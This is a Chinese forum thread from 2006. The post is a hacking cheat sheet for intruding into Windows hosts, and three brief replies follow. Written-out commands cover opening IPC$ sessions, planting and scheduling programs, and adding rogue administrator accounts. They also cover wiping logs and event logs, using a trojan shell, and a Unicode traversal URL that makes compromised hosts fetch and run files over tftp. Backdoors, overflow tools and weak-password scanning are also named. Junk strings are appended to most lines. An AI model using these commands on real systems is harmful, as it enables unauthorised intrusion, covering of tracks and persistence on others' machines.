社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3366阅读
  • 3回复

网管和黑客都必须知道的命令

级别: 总督察
发帖
536
铜板
2493
人品值
302
贡献值
1
交易币
10
好评度
461
信誉值
0
金币
0
所在楼道

网管和黑客都必须知道的命令 )mT{w9u  
常用的几条NET命令: d[;Sn:B  
w[~O@:`]<o  
(与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:"" HP}d`C5<R  
3qR%Mf'  
(以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator" ;HtHN K(o  
jc) [5i0  
(传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$ rH"&  
$TyV< G  
(查看远程主机时间) net time \\IP地址 S 'S|k7Lp  
?B3   
(定时启动某个程序) at \\IP地址 02:18 readme.exe `?+lM  
Nb~.6bsL  
(查看共享) net view \\IP地址 oswS<t{Z  
I?}YS-2  
(查看netbios工作组列表) nbtstat -A IP地址 V`sINX  
;^za/h>r  
(将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator" DUUQz:?{J  
>0z(+}]3z  
(这两条把自己增加到管理员组): net user 用户名 密码 /add H3"90^|,@  
 pbM~T(Y8  
net localgroup Administrators 用户名 /add N=]2vyh  
jHBzZ!<  
(断开连接) net use \\IP地址\ipc$ /delete r8x<- u4  
x?v/|  
扫尾: Z+! ._uA  
%;$zR}  
del C:\winnt\system32\logfiles\*.* 8R<2I1xn2  
;L (dmx?  
del C:\winnt\ssytem32\config\*.evt MwMv[];I  
^}vLZA  
del C:\winnt\system32\dtclog\*.* Q^}6GS$  
9aky+  
del C:\winnt\system32\*.log [+<lm 5t  
f mu `o-  
del C:\winnt\system32\*.txt $Tci_(V=F  
?UCK  
del C:\winnt\*.txt T<1* R>el  
{,61V;Bpm  
del C:\winnt\*.log [9dW9[Z+!  
is @8x!c  
一、netsvc.exe h8OmO5/H  
qP=4D 9 ]  
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: w9h`8pt  
L6S!?t.{Yv  
netsvc /list \\IP地址 vDl6TKXcu  
`R]B<gp  
netsvc schedule \\IP地址 /query  ,U':=8  
!lf'gW  
netsvc \\IP地址 schedule /start X&R ,-^  
s3?pv  
二、OpenTelnet.exe =g)|g+[H  
K'z|a{ru.{  
远程启动主机的Telnet服务,并绑定端口到7878,例如: #Duz|F+%  
hZ6CiEJB  
OpenTelnet \\IP地址 用户名 密码 1 7878 #;,dk(URo  
_ T ;+*  
然后就可以telnet到主机的7878端口,进入DOS方式下: =s3f{0G  
JtA tG%  
telnet IP地址 7878 P?D;BAP2  
Hq=5/N  
三、winshell.exe Ch;C\H:X  
8Ac5K!  
一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令: 9,8}4Y=GVI  
92zo+bc  
p Path (查看winshell主程序的路径信息) $}kT )+K  
Z#w@ /!"}T  
b reBoot (重新启动机器) :Z rE/3_S  
h2M>4c  
d shutDown (关闭机器) zq\YZ:JC  
*UM=EQaYk  
s Shell (执行后你就会看到可爱的“C:\>”) +*/XfPlr|  
B+W 4r9#  
x eXit (退出本次登录会话,此命令并不终止winshell的运行) cVCylR U"  
DPIIE2X  
CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) i`#5dIb   
^0" W/  
四、3389登陆器,GUI方式登录远程主机的 M;s r1C  
6XU1w  
五、elsave.exe (<y~]igy  
\Eqxmo  
事件日志清除工具 %C}TdG(C  
b|_Pt  
elsave -s \\IP地址 -l "application" -C VsLlPw{  
Z1u:OI@(  
elsave -s \\IP地址 -l "system" -C h,QC#Ak o  
*2wFLh  
elsave -s \\IP地址 -l "security" -C o \ss  
R Ptc \4  
执行后成功清除应用程序日志,系统日志,安全日志 QAs$fi}f]s  
wCT. (d_  
六、hbulot.exe G+Gd ;`4  
-n.ltgW@   
开启win2kserver和winxp的3389服务 u!wR  
9a4Xf%!F>z  
hbulot [/r] doeYc  
Ci{,e%  
使用/r表示安装完成后自动重起目标使设置生效。 GI:J9TS  
~{- zj  
七、nc.exe(netcat.exe) B5FRe'UC  
`+Ko{rf+9  
一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 +\r=/""DW  
4@|"1D3  
想要连接到某处: nc [-options] hostname port[s] [ports] ... f;";P  
0|mF /  
绑定端口等待连接: nc -l -p port [-options] [hostname] [port] 3eOwy~  
UvwO/A\Gv  
参数: hRKAs ]^j  
ZcT%H*Ib]9  
-e prog 程序重定向,一旦连接,就执行 [危险!!] A^\A^$|O6  
Ns3k(j16  
-g gateway source-routing hop point[s], up to 8 Zp:(U3%  
/F/zMZGSA{  
-G num source-routing pointer: 4, 8, 12, ... V)HX+D>  
1D@'uApi.  
-h 帮助信息 fcDiYJC*  
j A/xe  
-i secs 延时的间隔 (A@~]N ,U/  
Na6z1&wS  
-l 监听模式,用于入站连接 o u%Xnk~  
Q[5j5vry  
-n 指定数字的IP地址,不能用hostname %5) 1^  
vR;?~^{*s  
-o file 记录16进制的传输 \J@i:J6x$1  
AC`4n|,zJ;  
-p port 本地端口号 Atdr|2  
ey icMy`7{  
-r 任意指定本地及远程端口 5G$sP,n  
QOb+6qy:3  
-s addr 本地源地址 R<"fcsU  
)83UF r4kP  
-u UDP模式 <m") 2dJ  
?\_\pa/+  
-v 详细输出——用两个-v可得到更详细的内容 }cl~Vo-mp  
EMe3Xb `  
-w secs timeout的时间 .\/jy]Y  
OC(S"&D  
-z 将输入输出关掉——用于扫描时 2;!,:bFb  
八、TFTPD32.EXE W Z!?O0.A  
<o JM||ZA  
把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如: R8Kj3wp  
e|6kgj3/  
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名 G6l:El&  
*<.{sx^Gk  
然后可以直接令文件运行: +`y{r^xD  
|@Cx%aEKU  
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 zk#NM"C+  
~ 9 F rlj  
九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 P1gW+*?  
YU*u!  
一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。 6a_MA*XK  
UaW,#P  
一、一 Xscan命令行运行参数说明: ?vnO@Bb/a  
H> zX8qP+  
在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。 c/K:`XP~  
yJyovfJz.  
1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] V'-}B6 3S>  
?W6qwm,?L  
xscan -file <主机列表文件名> <检测项目> [其他选项] nTG@=C#  
2 %`~DVo  
其中<检测项目> 含义如下: q:}Q5gzZ  
F_<n8U:Y  
-port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表); df85g  
8[PD`*w  
-ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); 3e)W_P*0?  
{~L{FG)O  
-ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); ;7;=)/-  
+-s$Htx  
-cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); eUY/H1  
{ :^;byd  
-iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); ~2HlAU))<&  
 BVJ6U[h`  
[其他选项] 含义如下: 5o v F$qn  
D7X8yv1  
-v: 显示详细扫描进度 IdHyd Y1  
C[4{\3\Va  
-p: 跳过Ping不通的主机 a/@F?\A  
`f|Gw5R  
-o: 跳过没有检测到开放端口的主机 bi@z<Xm%  
Fj_6jsDb  
-t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 店掌柜
发帖
5692
铜板
103378
人品值
1520
贡献值
26
交易币
0
好评度
5373
信誉值
0
金币
0
所在楼道

只看该作者 1 发表于: 2006-03-28
学习····

简单生活
执著追求
别笑我浅溥,天真的以为用一腔真诚就能感动这个冷漠的世界。
也别说我幼稚,竟想用不长的人生去诠释繁杂的红尘。
然而除了真诚,我还能给你什么,的确我真的一无所有!

级别: 终身会员
发帖
1207
铜板
37
人品值
257
贡献值
35
交易币
0
好评度
1278
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-03-28
沙发哦 crDm2oA~t  
太专业信工系的都很难看懂
做我自己
做我自己喜欢的事
爱我自己喜欢的人
级别: 终身会员
发帖
690
铜板
11181
人品值
312
贡献值
5
交易币
0
好评度
653
信誉值
0
金币
0
所在楼道
只看该作者 3 发表于: 2006-03-28
努力ing

每個女孩都是一個無淚的天使,當她遇上心愛的男孩是時便有了淚。天使落淚,墜落人間。所以,每一個男孩都不能辜負他的女孩,因爲她曾經爲了你,放棄了整個天堂。
描述
快速回复

您目前还是游客,请 登录注册
批量上传需要先选择文件,再选择上传
认证码:
验证问题:
10+5=?,请输入中文答案:十五